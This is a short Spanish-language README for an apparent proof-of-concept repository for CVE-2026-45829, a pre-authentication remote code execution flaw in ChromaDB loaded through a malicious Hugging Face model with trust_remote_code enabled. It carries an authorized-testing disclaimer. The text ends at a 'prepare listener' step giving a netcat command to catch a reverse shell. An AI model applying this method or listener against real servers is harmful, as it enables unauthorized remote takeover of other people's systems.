# CVE-2026-45829 - ChromaDB Pre-Auth RCE (CVSS 10.0)

## ⚠️ ADVERTENCIA
Este repositorio contiene una **PoC FUNCIONAL** para CVE-2026-45829.
**SOLO para pruebas autorizadas en entornos controlados.**

## Descripción
Vulnerabilidad crítica en ChromaDB (versiones 1.0.0 a 1.5.8) que permite a un atacante no autenticado ejecutar código arbitrario mediante la carga de un modelo malicioso desde Hugging Face con `trust_remote_code=true`.

## Uso de la PoC

### Preparar listener
```bash
nc -lvnp 4444
